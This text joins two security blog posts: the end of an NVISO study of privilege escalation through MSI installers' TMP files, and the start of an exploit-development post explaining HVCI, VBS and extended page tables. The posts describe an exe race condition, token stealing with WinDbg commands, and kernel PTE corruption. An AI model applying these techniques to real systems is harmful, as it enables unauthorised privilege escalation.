Let’s take another example. This time the installation creates an exe file in TMP and executes it. In this case it can still be exploitable but we have to abuse a race condition. What we need to do is craft our own exe file and continuously overwrite the target exe file in TMP with our own exe. Then we start the installation and hope that our own exe file will be executed instead of the one from the installation. We can introduce a small delay, for example 50 milliseconds, between the writes hoping the installation will drop its exe file, which gets replaced by ours and executed by the installation within that small delay. Note that this kind of exploitation might take more patience and might need to restart the installation process multiple times to succeed. The video below shows an example of such a race condition:

However, even in case of execution under a SYSTEM context, applications can take precautions against abuse. Many of them read/write their sources to/from a randomized subdirectory in TMP, making it nearly impossible to exploit. We did notice that in some cases the directory appears random, but in fact remains constant in between installations, also allowing for abuse. 

So, what was the end result?

Out of 95 tested installers, 13 were vulnerable, 7 need to be further investigated and 75 were not found to be vulnerable. Not a bad result, considering that those are 13 easy to use zero-day privilege escalation vulnerabilities 😉. We reported them to the respective developers but were met with limited enthousiasm. Also, Ahmad and NVISO reported the attack surface vulnerability to Microsoft, and there is no fix for file system permission design. The recommendation is for the installer to follow the defense in depth principle, which puts responsibility with the developers packages their software.

If you’re interested in identifying this issue on systems you have permission on, you can use the helper programs we will soon release in an accompanying Github repository.

Stay tuned!

Defense & Mitigation

Since the Software Center is working as designed, what are some ways to defend against this?

  • Set AppEnforce user context if possible
  • Developers should consider absolute paths while using custom actions or make use of randomized folder paths
  • As a possible IoC for hunting: Identify DLL writes to c:\windows\temp

References

https://docs.microsoft.com/en-us/windows/win32/msi/windows-installer-portal
https://docs.microsoft.com/en-us/windows/win32/msi/installation-context
https://docs.microsoft.com/en-us/windows/win32/services/localsystem-account
https://docs.microsoft.com/en-us/mem/configmgr/comanage/overview
https://docs.microsoft.com/en-us/mem/configmgr/apps/deploy-use/packages-and-programs
https://docs.microsoft.com/en-us/mem/configmgr/apps/deploy-use/create-deploy-scripts
https://docs.microsoft.com/en-us/windows/win32/msi/custom-actions
https://docs.microsoft.com/en-us/mem/configmgr/core/understand/software-center
https://docs.microsoft.com/en-us/mem/configmgr/core/clients/deploy/deploy-clients-cmg-azure
https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-security

About the authors

Ahmad, who discovered this attack surface, is a cyber security researcher mainly focus in attack surface reduction and detection engineering. Prior to that he did software development and system administration and holds multiple certificates in advanced penetration testing and system engineering. You can find Ahmad on LinkedIn.

Oliver, the main author of this post, is a cyber security expert at NVISO. He has almost a decade and a half of IT experience which half of it is in cyber security. Throughout his career he has obtained many useful skills and also certificates. He’s constantly exploring and looking for more knowledge. You can find Oliver on LinkedIn.

Jonas Bauters is a manager within NVISO, mainly providing cyber resiliency services with a focus on target-driven testing. As the Belgian ARES (Adversarial Risk Emulation & Simulation) solution lead, his responsibilities include both technical and non-technical tasks. While occasionally still performing pass the hash (T1550.002) and pass the ticket (T1550.003), he also greatly enjoys passing the knowledge. You can find Jonas on LinkedIn.


Exploit Development: No Code Execution? No Problem! Living The Age of VBS, HVCI, and Kernel CFG

Introduction

I firmly believe there is nothing in life that is more satisfying than wielding the ability to execute unsigned-shellcode. Forcing an application to execute some kind of code the developer of the vulnerable application never intended is what first got me hooked on memory corruption. However, as we saw in my last blog series on browser exploitation, this is already something that, if possible, requires an expensive exploit - in terms of cost to develop. With the advent of Arbitrary Code Guard, and Code Integrity Guard, executing unsigned code within a popular user-mode exploitation “target”, such as a browser, is essentially impossible when these mitigations are enforced properly (and without an existing vulnerability).

Another popular target for exploit writers is the Windows kernel. Just like with user-mode targets, such as Microsoft Edge (pre-Chromium), Microsoft has invested extensively into preventing execution of unsigned, attacker-supplied code in the kernel. This is why Hypervisor-Protected Code Integrity (HVCI) is sometimes called “the ACG of kernel mode”. HVCI is a mitigation, as the name insinuates, that is provided by the Windows hypervisor - Hyper-V.

HVCI is a part of a suite of hypervisor-provided security features known as Virtualization-Based Security (VBS). HVCI uses some of the same technologies employed for virtualization in order to mitigate the ability to execute shellcode/unsigned-code within the Windows kernel. It is worth noting that VBS isn’t HVCI. HVCI is a feature under the umbrella of all that VBS offers (Credential Guard, etc.).

How can exploit writers deal with this “shellcode-less” era? Let’s start by taking a look into how a typical kernel-mode exploit may work and then examine how HVCI affects that mission statement.

“We guarantee an elevated process, or your money back!” - The Kernel Exploit Committee’s Mission Statement

Kernel exploits are (usually) locally-executed for local privilege escalation (LPE). Remotely-detonated kernel exploits over a protocol handled in the kernel, such as SMB, are usually more rare - so we will focus on local exploitation.

When locally-executed kernel exploits are exploited, they usually follow the below process (key word here - usually):

  1. The exploit (which usually is a medium-integrity process if executed locally) uses a kernel vulnerability to read and write kernel memory.
  2. The exploit uses the ability to read/write to overwrite a function pointer in kernel-mode (or finds some other way) to force the kernel to redirect execution into attacker-controlled memory.
  3. The attacker-controlled memory contains shellcode.
  4. The attacker-supplied shellcode executes. The shellcode could be used to arbitrarily call kernel-mode APIs, further corrupt kernel-mode memory, or perform token stealing in order to escalate to NT AUTHORITY\SYSTEM.

Since token stealing is extremely prevalent, let’s focus on it.

We can quickly perform token stealing using WinDbg. If we open up an instance of cmd.exe, we can use the whoami command to understand which user this Command Prompt is running in context of.

Using WinDbg, in a kernel-mode debugging session, we then can locate where in the EPROCESS structure the Token member is, using the dt command. Then, using the WinDbg Debugger Object Model, we then can leverage the following commands to locate the cmd.exe EPROCESS object, the System process EPROCESS object, and their Token objects.

dx -g @$cursession.Processes.Where(p => p.Name == "System").Select(p => new { Name = p.Name, EPROCESS = &p.KernelObject, Token = p.KernelObject.Token.Object})

dx -g @$cursession.Processes.Where(p => p.Name == "cmd.exe").Select(p => new { Name = p.Name, EPROCESS = &p.KernelObject, Token = p.KernelObject.Token.Object})

The above commands will:

  1. Enumerate all of the current session’s active processes and filter out processes named System (or cmd.exe in the second command)
  2. View the name of the process, the address of the corresponding EPROCESS object, and the Token object

Then, using the ep command to overwrite a pointer, we can overwrite the cmd.exe EPROCESS.Token object with the System EPROCESS.Token object - which elevates cmd.exe to NT AUTHORITY\SYSTEM privileges.

It is truly a story old as time - and this is what most kernel-mode exploit authors attempt to do. This can usually be achieved through shellcode, which usually looks something like the image below.

However, with the advent of HVCI - many exploit authors have moved to data-only attacks, as HVCI prevents unsigned-code execution, like shellcode, from running (we will examine why shortly). These so-called “data-only attacks” may work something like the following, in order to achieve the same thing (token stealing):

  1. NtQuerySystemInformation allows a medium-integrity process to leak any EPROCESS object. Using this function, an adversary can locate the EPROCESS object of the exploiting process and the System process.
  2. Using a kernel-mode arbitrary write primitive, an adversary can then copy the token of the System process over the exploiting process, just like before when we manually performed this in WinDbg, simply using the write primitive.

This is all fine and well - but the issue resides in the fact an adversary would be limited to hot-swapping tokens. The beauty of detonating unsigned code is the extensibility to not only perform token stealing, but to also invoke arbitrary kernel-mode APIs as well. Most exploit writers sell themselves short (myself included) by stopping at token stealing. Depending on the use case, “vanilla” escalation to NT AUTHORITY\SYSTEM privileges may not be what a sophisticated adversary wants to do with kernel-mode code execution.

A much more powerful primitive, besides being limited to only token stealing, would be if we had the ability to turn our arbitrary read/write primitive into the ability to call any kernel-mode API of our choosing! This could allow us to allocate pool memory, unload a driver, and much more - with the only caveat being that we stay “HVCI compliant”. Let’s focus on that “HVCI compliance” now to see how it affects our exploitation.

Note that the next three sections contain an explanation of some basic virtualization concepts, along with VBS/HVCI. If you are familiar, feel free to skip to the From Read/Write To Arbitrary Kernel-Mode Function Invocation section of this blog post to go straight to exploitation.

Hypervisor-Protected Code Integrity (HVCI) - What is it?

HVCI, at a high level, is a technology on Windows systems that prevents attackers from executing unsigned-code in the Windows kernel by essentially preventing readable, writable, and executable memory (RWX) in kernel mode. If an attacker cannot write to an executable code page - they cannot place their shellcode in such pages. On top of that, if attackers cannot force data pages (which are writable) to become code pages - said pages which hold the malicious shellcode can never be executed.

How is this manifested? HVCI leverages existing virtualization capabilities provided by the CPU and the Hyper-V hypervisor. If we want to truly understand the power of HVCI it is first worth taking a look at some of the virtualization technologies that allow HVCI to achieve its goals.

Hyper-V 101

Before prefacing this section (and the next two sections), all information provided can be found within Windows Internals 7th Edition: Part 2, Intel 64 and IA-32 Architectures Software Manual, Combined Volumes, and Hypervisor Top Level Functional Specification.

Hyper-V is Microsoft’s hypervisor. Hyper-V uses partitions for virtualization purposes. The host operating system is the root partition and child partitions are partitions that are allocated to host a virtual machine. When you create a Hyper-V virtual machine, you are allocating some system resources to create a child partition for the VM. This includes its own physical address space, virtual processors, virtual hard disk, etc. Creating a child partition creates a boundary between the root and child partition(s) - where the child partition is placed in its own address space, and is isolated. This means one virtual machine can’t “touch” other virtual machines, or the host, as the virtual machines are isolated in their own address space.

Among the technologies that help augment this isolation is Second Layer Address Translation, or SLAT. SLAT is what actually allows each VM to run in its own address space in the eyes of the hypervisor. Intel’s implementation of SLAT is known as Extended Page Tables, or EPT.

At a basic level, SLAT (EPT) allows the hypervisor to create an additional translation of memory - giving the hypervisor power to delegate memory how it sees fit.

When a virtual machine needs to access physical memory (the virtual machine could have accessed virtual memory within the VM which then was translated into physical memory under the hood), with EPT enabled, the hypervisor will tell the CPU to essentially “intercept” this request. The CPU will translate the memory the virtual machine is trying to access into actual physical memory.

The virtual machine doesn’t know the layout of the physical memory of the host OS, nor does it “see” the actual pages. The virtual machine operates on memory identically to how a normal system would - translating virtual addresses to physical addresses. However, behind the scenes, there is another technology (SLAT) which facilitates the process of taking the physical address the virtual machine thinks it is accessing and translating said physical memory into the actual physical memory on the physical computer - with the VM just operating as normal. Since the hypervisor, with SLAT enabled, is aware of both the virtual machine’s “view” of memory and the physical memory on the host - it can act as arbitrator to translate the memory the VM is accessing into the actual physical memory on the computer (we will come to a visual shortly if this is a bit confusing).

It is worth investigating why the hypervisor needs to perform this additional layer of translation in order to not only understand basic virtualization concepts - but to see how HVCI leverages SLAT for security purposes.

As an example - let’s say a virtual machine tries to access the virtual address 0x1ad0000 within the VM - which (for argument’s sake) corresponds to the physical memory address 0x1000 in the VM. Right off the bat we have to consider that all of this is happening within a virtual machine - which runs on the physical computer in a pre-defined location in memory on that physical computer (a child partition in a Hyper-V setup).

The VM can only access its own “view” of what it thinks the physical address 0x1000 is. The physical location in memory (since VMs run on a physical computer, they use the physical computer’s memory) where the VM is accessing (what it thinks is 0x1000) is likely not going to be located at 0x1000 on the physical computer itself. This can be seen below (please note that the below is just a visual representation, and may not represent things like memory fragmentation, etc.).

In the above image, the physical address of the VM located at 0x1000 is stored at the physical address of 0x4000 on the physical computer. So when the VM needs to access what it thinks is 0x1000, it actually needs to access the contents of 0x4000 on the physical computer.

This creates an issue, as the VM not only needs to compensate for “normal” paging to come to the conclusion that the virtual address in the VM, 0x1ad0000, corresponds to the physical address 0x1000 - but something needs to compensate for the fact that when the VM tries to access the physical address 0x1000 that the memory contents of 0x1000 (in context of the VM) are actually stored somewhere in the memory of the physical computer the VM is running on (in this case 0x4000).

To address this, the following happens: the VM walks the paging structures, starting with the base paging structure, PML4, in the CR3 CPU register within the VM (as is typical in “normal” memory access). Through paging, the VM would eventually come to the conclusion that the virtual address 0x1ad0000 corresponds to the physical address 0x1000. However, we know this isn’t the end of the conversion because although 0x1000 exists in context of the VM as 0x1000, that memory stored there is stored somewhere else in the physical memory of the physical computer (in this case 0x4000).

With SLAT enabled the physical address in the VM (0x1000) is treated as a guest physical address, or GPA, by the hypervisor. Virtual machines emit GPAs, which then are converted into a system physical address, or SPA, by the physical CPU. SPAs refer to the actual physical memory on the physical computer the VM(s) is/are running on.

The way this is done is through another set of paging structures called extended page tables (EPTs). The base paging structure for the extended page tables is known as the EPT PML4 structure - similarly to a “traditional” PML4 structure. As we know, the PML4 structure is used to further identify the other paging structures - which eventually lead to a 4KB-aligned physical page (on a typical Windows system). The same is true for the EPT PML4 - but instead of being used to convert a virtual address into a physical one, the EPT PML4 is the base paging structure used to map a VM-emitted guest physical address into a system physical address.

The EPT PML4 structure is referenced by a pointer known as the Extended Page Table Pointer, or EPTP. An EPTP is stored in a per-VCPU (virtual processor) structure called the Virtual Machine Control Structure, or VMCS. The VMCS holds various information, including state information about a VM and the host. The EPTP can be used to start the process of converting GPAs to SPAs for a given virtual machine. Each virtual machine has an associated EPTP.

To map guest physical addresses (GPAs) to system physical addresses (SPAs), the CPU “intercepts” a GPA emitted from a virtual machine. The CPU then takes the guest physical address (GPA) and uses the extended page table pointer (EPTP) from the VMCS structure for the virtual CPU the virtual machine is running under, and it uses the extended page tables to map the GPA to a system physical address (SPA).

The above process allows the hypervisor to map what physical memory the guest VM is actually trying to access, due to the fact the VM only has access to its own allocated address space (like when a child partition is created for the VM to run in).

The page table entries within the extended page tables are known as extended page table entries, or EPTEs. These act essentially the same as “traditional” PTEs - except for the fact that EPTEs are used to translate a GPA into an SPA - instead of translating a virtual address into a physical one (along with some other nuances). What this also means is that EPTEs are only used to describe physical memory (guest physical addresses and system physical addresses).

The reason why EPTEs only describe physical memory is pretty straightforward. The “normal” page table entries (PTEs) are already used to map virtual memory to physical memory - and they are also used to describe virtual memory. Think about a normal PTE structure - it stores some information which describes a given virtual page (readable, writable, etc.) and it also contains a page frame number (PFN) which, when multiplied by the size of a page (usually 0x1000), gives us the physical page backing the virtual memory. This means we already have a mechanism to map virtual memory to physical memory - so the EPTEs are used for GPAs and SPAs (physical memory).

Another interesting side effect of only applying EPTEs to physical memory is the fact that physical memory trumps virtual memory (we will talk more about how this affects traditional PTEs later and the level of enforcement on memory PTEs have when coupled with EPTEs).

For instance, if a given virtual page is marked as readable/writable/executable in its PTE - but the physical page backing that virtual page is described as only readable - any attempt to execute and/or write to the page will result in an access violation. Since the EPTEs describe physical memory and are managed by the hypervisor, the hypervisor can enforce its “view” of memory leveraging EPTEs - meaning that the hypervisor ultimately can decide how a given page of RAM should be defined. This is the key tenet of HVCI.

Think back to our virtual machine to physical machine example. The VM has its own view of memory, but ultimately the hypervisor had the “supreme” view of memory. It understands where the VM thinks it is accessing and it can correlate that to the actual place in memory on the physical computer. In other words, the hypervisor contains the “ultimate” view of memory.

Now, I am fully aware a lot of information has been mentioned above. At a high level, we should walk away with the following knowledge:

  1. It is possible to isolate a virtual machine in its own address space.
  2. It is possible to abstract the physical memory that truly exists on the host operating system away from the virtual machine.
  3. Physical memory trumps virtual memory (if virtual memory is read/write and the physical memory is read-only, any write to the region will cause an access violation).
  4. EPTEs facilitate the “supreme” view of memory, and have the “final say”.

The above concepts are the basis for HVCI (which we will expand upon in the next section).

Before leaving this section of the blog post - we should recall what was said earlier about HVCI:

HVCI is a feature under the umbrella of all that VBS offers (Credential Guard, etc.).

What this means is that Virtualization-Based Security is responsible for enabling HVCI. Knowing that VBS is responsible for enabling HVCI (should it be enabled on the host operating system which, as of Windows 11 and Windows 10 “Secured Core” PCs, it is by default), the last thing we need to look at is how VBS takes advantage of all of these virtualization technologies we have touched on in order to instrument HVCI.

Virtualization-Based Security

With Virtualization-Based Security enabled, the Windows operating system runs in a “virtual machine”, of sorts. Although Windows isn’t placed into a child partition, meaning it doesn’t have a VHD, or virtual hard disk - the hypervisor, at boot, makes use of all of the aforementioned principles and technologies to isolate the “standard” Windows kernel (e.g. what the end-user interfaces with) in its own region, similarly to how a VM is isolated. This isolation is manifest through Virtual Trust Levels, or VTLs. Currently there are two Virtual Trust Levels - VTL 1, which hosts the “secure kernel” and VTL 0, which hosts the “normal kernel” - with the “normal kernel” being what end-users interact with. Both of these VTLs are located in the root partition. You can think of these two VTLs as “isolated virtual machines”.

VTLs, similarly to virtual machines, provide isolation between the two environments (in this case between the “secure kernel” and the “normal kernel”). Microsoft considers the “secure” environment, VTL 1, to be a “more privileged entity” than VTL 0 - with VTL 0 being what a normal user interfaces with.

The goal of the VTLs is to create a higher security boundary (VTL 1) where if a normal user exploits a vulnerability in the kernel of VTL 0 (where all users are executing, only Microsoft is allowed in VTL 1), they are limited to only VTL 0. Historically, however, if a user compromised the Windows kernel, there was nothing else to protect the integrity of the system - as the kernel was the highest security boundary. Now, since VTL 1 is of a “higher boundary” than VTL 0 - even if a user exploits the kernel in VTL 0, there is still a component of the system that is totally isolated (VTL 1) from where the malicious user is executing (VTL 0).

It is crucial to remember that although VTL 0 is a “lower security boundary” than VTL 1 - VTL 0 doesn’t “live” in VTL 1. VTL 0 and VTL 1 are two separate entities - just as two virtual machines are two separate entities. On the same note - it is also crucial to remember that VBS doesn’t actually create virtual machines - VBS leverages the virtualization technologies that a hypervisor may employ for virtual machines in order to isolate VTL 0 and VTL 1. Microsoft instruments these virtualization technologies in such a way that, although VTL 1 and VTL 0 are separated like virtual machines, VTL 1 is allowed to impose its “will” on VTL 0. When the system boots, and the “secure” and “normal” kernels are loaded - VTL 1 is then allowed to “ask” the hypervisor, through a mechanism called a hypercall (more on this later in the blog post), if it can “securely configure” VTL 0 (which is what the normal user will be interfacing with) in a way it sees fit, when it comes to HVCI. VTL 1 can impose its will on VTL 0 - but it goes through the hypervisor to do this. To summarize - VTL 1 isn’t the hypervisor, and VTL 0 doesn’t live in VTL 1. VTL 1 works with the hypervisor to configure VTL 0 - and all three are their own separate entities. The following image is from Windows Internals, Part 1, 7th Edition - which visualizes this concept.

We’ve talked a lot now on SLAT and VTLs - let’s see how these technologies are both used to enforce HVCI.

After the “secure” and “normal” kernels are loaded - execution eventually redirects to the entry point of the “secure” kernel, in VTL 1. The secure kernel will set up SLAT/EPT, by asking the hypervisor to create a series of extended page table entries (EPTEs) for VTL 0 through the hypercall mechanism (more on this later). We can think of this as if we are treating VTL 0 as “the guest virtual machine” - just like how the hypervisor would treat a “normal” virtual machine. The hypervisor would set up the necessary EPTEs that would be used to map the guest physical addresses generated from a virtual machine into actual physical memory (system physical addresses). However, let’s recall the architecture of the root partition when VTLs are involved.

As we can see, both VTL 1 and VTL 0 reside within the root partition. This means that, theoretically, both VTL 1 and VTL 0 have access to the physical memory on the physical computer. At this point you may be wondering - if both VTL 1 and VTL 0 reside within the same partition - how is there any separation of address space/privileges? VTL 0 and VTL 1 seem to share the same physical address space. This is where virtualization comes into play!

Microsoft leverages all of the virtualization concepts we have previously talked about, and essentially places VTL 1 and VTL 0 into “VMs” (logically speaking) in which VTL 0 is isolated from VTL 1, and VTL 1 has control over VTL 0 - with this architecture being the basis of HVCI (more on the technical details shortly).

If we treat VTL 0 as “the guest” we then can use the hypervisor and CPU to translate addresses requested from VTL 0 (the hypervisor “manages” the EPTEs but the CPU performs the actual translation). Since GPAs are “intercepted”, in order for them to be converted into SPAs, this provides a mechanism (via SLAT) to “intercept” or “gate” any memory access stemming from VTL 0.

Here is where things get very interesting. Generally speaking, the GPAs emitted by VTL 0 actually map to the same physical memory on the system.

Let’s say VTL 0 requests to access the physical address 0x1000, as a result of a virtual address within VTL 0 being translated to the physical address 0x1000. The address of the GPA, which is 0x1000, is still located at an SPA of 0x1000. This is due to the fact that virtual machines, in Hyper-V, are confined to their respective partitions - and since VTL 1 and VTL 0 live in the same partition (the root), they “share” the same physical memory address space (which is the actual physical memory on the system).

So, since EPT (with HVCI enabled) isn’t used to “find” the physical address a GPA corresponds to on the system - due to the GPAs and SPAs mapping to the same physical address - what on earth could they be used for?

Instead of using extended page table entries to traverse the extended page tables in order to map one GPA to another SPA, the EPTEs are instead used to create a “second view” of memory - with this view describing all of RAM as either readable and writable (RW) but not executable - or readable and executable - but not writable, when dealing with HVCI. This ensures that no pages exist in the kernel which are writable and executable at the same time - which is a requirement for unsigned-code!

Recall that EPTEs are used to describe each physical page. Just as a virtual machine has its own view of memory, VTL 0 also has its own view of memory, which it manages through standard, normal PTEs. The key to remember, however, is that at boot - code in VTL 1 works with the hypervisor to create EPTEs which have the true definition of memory - while the OS in VTL 0 only has its view of memory. The hypervisor’s view of memory is “supreme” - as the hypervisor is a “higher security boundary” than the kernel, which historically managed memory. This, as mentioned, essentially creates two “mappings” of the actual physical memory on the system - one is managed by the Windows kernel in VTL 0, through traditional page table entries, and the other is managed by the hypervisor using extended page table entries.

Since we know EPTEs are used to describe physical memory, this can be used to override any protections that are set by the “traditional” PTEs themselves in VTL 0. And since the hypervisor’s view of virtual memory trumps the OS (in VTL 0) view - HVCI leverages the fact that since the EPTEs are managed by a more “trusted” boundary, the hypervisor, they are immutable in context of VTL 0 - where the normal users live.

As an example, let’s say you use the !pte command in WinDbg to view the PTE for a given virtual memory address in VTL 0, and WinDbg says that page is readable, writable, and executable. However, the EPTE (which is not transparent to VTL 0) may actually describe the physical page backing that virtual address as only readable. This means the page would be only readable - even though the PTE in VTL 0 says otherwise!

HVCI leverages SLAT/EPT in order to ensure that there are no pages in VTL 0 which can be abused to execute unsigned-code (by enforcing the aforementioned principles on RWX memory). It does this by guaranteeing that code pages never become writable - or that data pages never become executable. You can think of EPTEs being used (with HVCI) to basically create an additional “mapping” of memory, with all memory being either RW- or R-X, and with this “mapping” of memory trumping the “normal” enforcement of memory through normal PTEs. The EPTE “view” of memory is the “root of trust” now. These EPTEs are managed by the hypervisor, which VTL 0 cannot touch.

We know now that the EPTEs have the “true” definition of memory - so a logical question would now be “how does the request, from the OS, to setup an EPTE work if the EPTEs are managed by the hypervisor?” As an example, let’s examine how boot-loaded drivers have their memory protected by HVCI (the process of loading runtime drivers is different - but the mechanism (which is a hypercall - more on this later), used to apply SLAT page protections remains the same for runtime drivers and boot-loaded drivers).

We know that VTL 1 performs the request for the configuration of EPTEs in order to configure VTL 0 in accordance with HVCI (no memory that is writable and executable). This means that securekernel.exe - which is the “secure kernel” running in VTL 1 - must be responsible for this. Cross referencing the VSM startup section of Windows Internals, we can observe the following:

… Starts the VTL secure memory manager, which creates the boot table mapping and maps the boot loader’s memory in VTL 1, creates the secure PFN database and system hyperspace, initializes the secure memory pool support, and reads the VTL 0 loader block to copy the module descriptors for the Secure Kernel’s imported images (Skci.dll, Cnf.sys, and Vmsvcext.sys). It finally walks the NT loaded module list to establish each driver state, creating a NAR (normal address range) data structure for each one and compiling an Normal Table Entry (NTE) for every page composing the boot driver’s sections. FURTHERMORE, THE SECURE MEMORY MANAGER INITIALIZATION FUNCTION APPLIES THE CORRECT VTL 0 SLAT PROTECTION TO EACH DRIVER’S SECTIONS.

Let’s start with the “secure memory manager initialization function” - which is securekernel!SkmmInitSystem.

securekernel!SkmmInitSystem performs a multitude of things, as seen in the quote from Windows Internals. Towards the end of the function, the memory manager initialization function calls securekernel!SkmiConfigureBootDriverPages - which eventually “applies the correct VTL 0 SLAT protection to each [boot-loaded] driver’s sections”.

There are a few code paths which can be taken within securekernel!SkmiConfigureBootDriverPages to configure the VTL 0 SLAT protection for HVCI - but the overall “gist” is:

  1. Check if HVCI is enabled (via SkmiFlags).
  2. If HVCI is enabled, apply the appropriate protection.

As mentioned in Windows Internals, each of the boot-loaded drivers has each section (.text, etc.) protected by HVCI. This is done by iterating through each section of the boot-loaded drivers and applying the correct VTL 0 permissions. In the specific code path shown below, this is done via the function securekernel!SkmiProtectSinglePage.

Notice that securekernel!SkmiProtectSinglePage has its second argument as 0x102. Examining securekernel!SkmiProtectSinglePage a bit further, we can see that this function (in the particular manner securekernel!SkmiProtectSinglePage is called within securekernel!SkmiConfigureBootDriverPages) will call securekernel!ShvlProtectContiguousPages under the hood.

securekernel!ShvlProtectContiguousPages is called because if the if ((a2 & 0x100) != 0) check is satisfied in the above function call (and it will be satisfied, because the provided argument was 0x102 - which, when bitwise AND’d with 0x100, does not equal 0), the function that will be called is securekernel!ShvlProtectContiguousPages. The last argument provided to securekernel!ShvlProtectContiguousPages is the appropriate protection mask for the VTL 0 page. Remember - this code is executing in VTL 1, and VTL 1 is allowed to configure the “true” memory permission (via EPTEs) VTL 0 as it sees fit.

securekernel!ShvlProtectContiguousPages, under the hood, invokes a function called securekernel!ShvlpProtectPages - essentially acting as a “wrapper”.

Looking deeper into securekernel!ShvlpProtectPages, we notice some interesting functions with the word “hypercall” in them.

Grabbing one of these functions (securekernel!ShvlpInitiateVariableHypercall will be used, as we will see later), we can see it is a wrapper for securekernel!HvcallpInitiateHypercall - which ends up invoking securekernel!HvcallCodeVa.

I won’t get into the internals of this function - but securekernel!HvcallCodeVa emits a vmcall assembly instruction - which is like a “Hyper-V syscall”, called a “hypercall”. This instruction will hand execution off to the hypervisor. Hypercalls can be made by both VTL 1 and VTL 0.

When a hypercall is made, the “hypercall call code” (similar to a syscall ID) is placed into RCX in the lower 16 bits. Additional values are appended in the RCX register, as defined by the Hypervisor Top-Level Functional Specification, known as the “hypercall input value”.

Each hypercall returns a “hypercall status code” - which is a 16-byte value (whereas NTSTATUS codes are 32-bit). For instance, a code of HV_STATUS_SUCCESS means that the hypercall completed successfully.

Specifically, in our case, the hypercall call code associated with securekernel!ShvlpProtectPages is 0xC.

If we cross reference this hypercall call code with the the Appendix A: Hypercall Code Reference of the TLFS - we can see that 0xC corresponds with the HvCallModifyVtlProtectionMask - which makes sense based on the operation we are trying to perform. This hypercall will “configure” an immutable memory protection (SLAT protection) on the in-scope page (in our scenario, a page within one of the boot-loaded driver’s sections), in context of VTL 0.

We can also infer, based on the above image, that this isn’t a fast call, but a rep (repeat) call. Repeat hypercalls are broken up into a “series” of hypercalls because hypercalls only have a 50 microsecond interval to finish before other components (interrupts for instance) need to be serviced. Repeated hypercalls will eventually be finished when the thread executing the hypercall resumes.

To summarize this section - with HVCI there are two views of memory - one managed by the hypervisor, and one managed by the Windows kernel through PTEs. Not only does the hypervisor’s view of memory trump the Windows kernel view of memory - but the hypervisor’s view of memory is immutable from the “normal” Windows kernel. An attacker, even with a kernel-mode write primitive, cannot modify the permissions of a page through PTE manipulation anymore.

Let’s actually get into our exploitation to test these theories out.

HVCI - Exploitation Edition

As I have blogged about before, a common way kernel-mode exploits manifest themselves is the following (leveraging an arbitrary read/write primitive):

  1. Write a kernel-mode payload to kernel mode (could be KUSER_SHARED_DATA) or user mode.
  2. Locate the page table entry that corresponds to that page the payload resides.
  3. Corrupt that page table entry to mark the page as KRWX (kernel, read, write, and execute).
  4. Overwrite a function pointer (nt!HalDispatchTable + 0x8 is a common method) with the address of your payload and trigger the function pointer to gain code execution.

HVCI is able to combat this because of the fact that a PTE is “no longer the source of truth” for what permissions that memory page actually has. Let’s look at this in detail.

As we know, KUSER_SHARED_DATA + 0x800 is a common code cave abused by adversaries (although this is not possible in future builds of Windows 11). Let’s see if we can abuse it with HVCI enabled.

Note that using Hyper-V it is possible to enable HVCI while also disabling Secure Boot. Secure Boot must be disabled for kernel debugging. After disabling Secure Boot we can then enable HVCI, which can be found in the Windows Security settings under Core Isolation -> Memory Integrity. Memory Integrity is HVCI.

Let’s then manually corrupt the PTE of 0xFFFFF78000000000 + 0x800 to make this page readable/writable/executable (RWX).

0xFFFFF78000000000 + 0x800 should now be fully readable, writable, and executable. This page is empty (doesn’t contain any code) so let’s write some NOP instructions to this page as a proof-of-concept. When 0xFFFFF78000000000 + 0x800 is executed, the NOP instructions should be dispatched.

We then can load this address into RIP to queue it for execution, which should execute our NOP instructions.

The expected outcome, however, is not what we intend. As we can see, executing the NOPs crashes the system. This is even in the case of us explicitly marking the page as KRWX. Why is this? This is due to HVCI! Since HVCI doesn’t allow RAM to be RWX, the physical page backing KUSER_SHARED_DATA + 0x800 is “managed” by the EPTE (meaning the EPTEs’ definition of the physical page is the “root of trust”). Since the EPTE is managed by the hypervisor - the original memory allocation of read/write in KUSER_SHARED_DATA + 0x800 is what this page is - even though we marked the PTE (in VTL 0) as KRWX! Remember - EPTEs are “the root of trust” in this case - and they enforce their permissions on the page - regardless of what the PTE says. The result is us trying to execute code which looks executable in the eyes of the OS (in VTL 0), because the PTE says so - but in fact, the page is not executable. Therefore we get an access violation due to the fact we are attempting to execute memory which isn’t actually executable! This is because the hypervisor’s “view” of memory, managed by the EPTEs, trumps the view our VTL 0 operating system has - which instead relies on “traditional” PTEs.

This is all fine and dandy, but what about exploits that allocate RWX user-mode code, write shellcode that will be executed in the kernel into the user-mode allocation, and then use a kernel read/write primitive, similarly to the first example in this blog post to corrupt the PTE of the user-mode page to mark it as a kernel-mode page? If this were allowed to happen - as we are only manipulating the U/S bit and not manipulating the executable bits (NX) - this would violate HVCI in a severe way - as we now have fully-executable code in the kernel that we can control the contents of.

Practically, an attacker would start by allocating some user-mode memory (via VirtualAlloc or similar APIs/C-runtime functions). The attacker marks this page as readable/writable/executable. The attacker would then write some shellcode into this allocation (usually kernel exploits use token-stealing shellcode, but other times an attacker may want to use something else). The key here to remember is that the memory is currently sitting in user mode.

This allocation is located at 0x1ad0000 in our example (U in the PTE stands for a user-mode page).

Using a kernel vulnerability, an attacker would arbitrarily read memory in kernel mode in order to resolve the PTE that corresponds to this user-mode shellcode located at 0x1ad0000. Using the kernel vulnerability, an attacker could corrupt the PTE bits to tell the memory manager that this page is now a kernel-mode page (represented by the letter K).

Lastly, using the vulnerability again, the attacker overwrites a function pointer in kernel mode that, when executed, will actually execute our user-mode code.

Now you may be thinking - “Connor, you just told me that the kernel doesn’t allow RWX memory with HVCI enabled? You just executed RWX memory in the kernel! Explain yourself!”.

Let’s first start off by understanding that all user-mode pages are represented as RWX within the EPTEs - even with HVCI enabled. After all, HVCI is there to prevent unsigned-code from being executed in the kernel. You may also be thinking - “Connor, doesn’t that violate the basic principle of DEP in user-mode?”. In this case, no it doesn’t. Recall that earlier in this blog post we said the following:

(we will talk more about how this affects traditional PTEs later and the level of enforcement on memory PTEs have when coupled with EPTEs).

Let’s talk about that now.

